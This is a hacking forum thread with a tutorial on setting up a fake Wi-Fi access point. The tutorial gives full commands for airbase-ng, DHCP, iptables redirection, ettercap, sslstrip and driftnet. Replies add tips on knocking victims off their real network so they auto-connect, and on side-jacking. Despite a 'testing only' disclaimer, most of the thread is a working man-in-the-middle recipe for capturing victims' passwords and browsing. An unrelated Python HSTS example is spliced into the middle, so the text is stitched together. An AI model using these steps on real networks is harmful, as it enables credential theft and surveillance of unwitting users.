
Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

  1. #1
    Junior Member Lucifer
    Join Date
    Feb 2010
    Posts
    75

    Lucafa's tutorial: softAP with internet connection and MITM sniffing

    last update: 11/03/'10

    I will update this tutorial as I find and learn about new interesting MITM tools to use.

    PURPOSE OF THIS TUTORIAL: Setting up a fake AP so clients can connect (or be forced to connect) and surf the internet like on a real AP, while we sniff their data/passwords and such, as we will be the Man In The Middle without the victim(s) knowing.


    NOTE: this is for testing purposes only; it's illegal to mess with clients/APs that don't belong to you, and I will not help if I notice you're doing so.

    NEEDED:
    - A Backtrack 4 Final distro (LiveDVD/USB/hard disk install is recommended, VMware can cause problems)
    - A wireless injection-capable card (preferably with a well supported chipset like RTL8187, RT73, ...)
    - A second wired/wireless interface for an internet connection (a wired interface is recommended)
    - Semi-advanced Linux/Backtrack/Aircrack suite skills
    - Some common sense


    I will use mon0 (my monitor interface) and eth1 (internet); CHANGE those to your interfaces.
    Also, you will need to find your internet standard gateway and DNS name server(s).
    (my internet gateway and DNS name server are the same, 192.168.2.1)


    STEP 1: Establish an internet connection:
    Code:
    dhclient eth1

    STEP 2: Start your wireless interface in monitor mode:
    (make sure you'll use your monitor interface in step 4!)
    Code:
    airmon-ng start wlan0

    STEP 3: Configuring the dhcpd.conf:
    (in your root directory (desktop), make a new text file, name it dhcpd.conf,
    open it with kate, and paste this)

    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 192.168.2.1;
    range 192.168.2.130 192.168.2.140;
    }
    CHANGE the domain-name-server(s) to yours! The rest stays the same. Save the file.

    STEP 4: Setup fake AP:
    (look at this airbase-ng info page to learn how you could set up different types of fake APs)
    Code:
    airbase-ng -e wifree mon0

    STEP 5: Assign an IP, netmask, gateway and set route for at0:
    (at0 is the TAP interface that's auto-created by airbase)
    Code:
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

    STEP 6: Configure and start dhcp3 server:
    (so clients who connect to your fake AP will get an IP address and such)
    Code:
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

    STEP 7: Configure routing tables:
    (so an internet connection will be available on your softAP)
    Code:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    CHANGE the standard gateway to your internet standard gateway,
    and also the interface to your interface with the internet connection.


    STEP 8: Start MITM tools:
    (I will use ettercap, sslstrip, and driftnet, but you can do as you please.)

    => STEP 8.1: Change the etter.conf file:
    (this is necessary for ettercap to function properly)
    Code:
    kate /etc/etter.conf
    (scroll down the file, search for "Linux", "if you use iptables", "#redir_command_off" and "#redir_command_on", and just delete those two "#" signs; that's all you need to do. Save the file.)

    => STEP 8.2: Start ettercap:
    (to sniff passwords and such)
    Code:
    ettercap -T -q -p -i at0 // //

    => STEP 8.3: Start sslstrip:
    (to strip down secure https sites the victim visits, like hotmail.com, gmail, ... so the login details can be sniffed)
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sslstrip -a -k -f

    => STEP 8.4: Start driftnet:
    (this will show all the images the victim sees in his browser)
    Code:
    driftnet -v -i at0

    That's it! If you got all this down, well done.

    Now you should learn how airdrop-ng/mdk3 works to force clients (victims) to connect to your fake AP, so you can sniff their data.

    If you followed this tutorial correctly, your fake AP should be almost as fast as your real AP; at least, mine always is.
    I cannot tell the difference between surfing on the fake and on my real AP, but on the fake, everything gets sniffed.

    Note that I am still a semi-noob myself; it could be that some of the commands I provided aren't 100% correct, but this is just the way I do it.
    I had to figure it all out by myself, looking at other tutorials and piecing the puzzle together,
    and it's working amazingly well for me.
    If you're experiencing slow internet on your rogue AP, try it on a different PC! I also had to do this: when using the exact same commands and the same Alfa adapter on my laptop, it doesn't work. I don't know why, maybe it's hardware related.
    Changing interface MTU values like some people suggest didn't work for me.
    On my older PC, done this way, this tutorial I made works perfectly.
    Lastly, always remember you could go to jail when doing stuff like this to people you don't know, or don't have the authority to do so. DON'T DO IT.

    If someone knows other neat mitm tools I could add, please share.

    Comments are welcome!

    David
    Last edited by Lucifer; 03-31-2010 at 07:21 PM.
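Step 8.3 relies on the browser putting a plaintext http:// request on the wire that sslstrip can rewrite. The following is an added example, not code from the thread or from any of the tools it names, modelling the browser-side HSTS cache (RFC 6797) that closes exactly that gap: once a site has been seen over HTTPS with a Strict-Transport-Security header, the browser upgrades later http:// links itself, so a downgraded page served by the rogue AP cannot set or clear the policy and never gets a plaintext login request. Hostnames and header values are constructed.

```python
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains), or None if absent/malformed."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        arg = arg.strip().strip('"')
        if name.lower() == "max-age" and arg.isdigit():
            max_age = int(arg)
        elif name.lower() == "includesubdomains":
            include_sub = True
    return None if max_age is None else (max_age, include_sub)


class HstsStore:
    """Minimal model of a browser's HSTS cache: host -> (expiry, include_subdomains)."""
    def __init__(self, clock):
        self.clock = clock  # injectable time source so behaviour is deterministic
        self.hosts = {}

    def observe(self, url, headers):
        """Learn a policy from a response; HSTS sent over plain HTTP is ignored, as RFC 6797 requires."""
        parts = urlsplit(url)
        policy = parse_hsts(headers.get("Strict-Transport-Security", ""))
        if parts.scheme != "https" or policy is None:
            return
        max_age, include_sub = policy
        if max_age == 0:
            self.hosts.pop(parts.hostname, None)  # max-age=0 deletes the policy
        else:
            self.hosts[parts.hostname] = (self.clock() + max_age, include_sub)

    def is_known(self, host):
        """Covered by its own unexpired entry, or by a parent entry carrying includeSubDomains."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self.hosts.get(".".join(labels[i:]))
            if entry and entry[0] > self.clock() and (i == 0 or entry[1]):
                return True
        return False

    def upgrade(self, url):
        """Return the URL the browser actually requests: http:// to a known host becomes https:// before it leaves the client."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known(parts.hostname or ""):
            netloc = parts.netloc[:-3] if parts.netloc.endswith(":80") else parts.netloc
            return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
        return url
```

The policy has to be learned on a trustworthy network first, which is why preloaded HSTS lists exist; the example shows the cache's behaviour, not the preload mechanism.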

  2. #2
    Member
    Join Date
    Feb 2010
    Posts
    75

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Nice tut, thanks for taking the time to put it together.
    Will give it a try soon.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi, thanks, that iptables part is great. I've had so many problems with iptables, but now it seems to work.

    This is a great HowTo. It's recommended to use this with a wired connection.

    I also used hamster for side-jacking
    Last edited by halfdone; 03-26-2010 at 09:52 PM.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Great tutorial, it worked on my first try--

    I have one concern though. Once the victim establishes a connection to the rogue AP all of the other hosts on the same network are visible to them. I'm trying to create more of a sand-boxed rogue AP environment. Maybe this could be done with more iptables rules. Any ideas? First I'm going to play with airdrop-ng.

    Thanks again!

  5. #5
    Junior Member Lucifer
    Join Date
    Feb 2010
    Posts
    75

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I'm glad I could help you guys.
    As for the sandboxed rogue AP, I had some thoughts about it, but it goes beyond my knowledge, sorry!
    I know about hamster as well, but I'm not into side-jacking; thanks for sharing though.

    One last comment: when using airdrop-ng to break connections between clients and their real APs, keep this in mind: the ESSID AND the encryption need to be the same as the victim uses on his real AP, otherwise a Windows victim for instance will not auto-reconnect to your fake AP. (We want the victim to auto-connect to our rogue AP when his connection to his real AP is broken; waiting for the victim to manually connect takes too long, get it?)
    As soon as you start using airdrop against a client and the ESSID and encryption are set correctly in airbase, the victim will instantly connect; no escape from the rogue AP possible.
    For the victim, it'll be 'a little lag', but to us, it's success!

    grtz
    Last edited by Lucifer; 03-24-2010 at 01:50 PM.

  6. #6
    Junior Member
    Join Date
    Mar 2010
    Posts
    29

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Nice tutorial. I'm not sure if it works yet; if it does, I think I'll put it into a shell script to speed up the process. How would you change the fake login page that the victim is forced to be directed to?

  7. #7
    Junior Member Lucifer
    Join Date
    Feb 2010
    Posts
    75

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    What fake login page? There isn't one in my tutorial.. but if you're planning on redirecting victims to certain pages, I cannot help you since my knowledge is still very limited. I was only able to make this tutorial by looking at other tutorials on the net, but none of them was as well explained as mine, I think; I made it so that anybody can do this without having to mess around for 3 days like I did.
    If you're gonna put it in a script, please share it.

    Thanks,

    .L

  8. #8
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by marthafocker
    Nice tutorial. I'm not sure if it works yet, If it does I think I'll put into a shell script to speed up the process. How would you change the fake login page that the victim is forced to into being directed to?
    Has anyone done that - how to create a fake login page and force victims to it?

  9. #9
    Junior Member
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    79

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Very nice tut! I also liked the way you spelled illegal that should be its proper spelling.

  10. #10
    Junior Member Lucifer
    Join Date
    Feb 2010
    Posts
    75

    Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Whoops, corrected it. I'm Dutch.
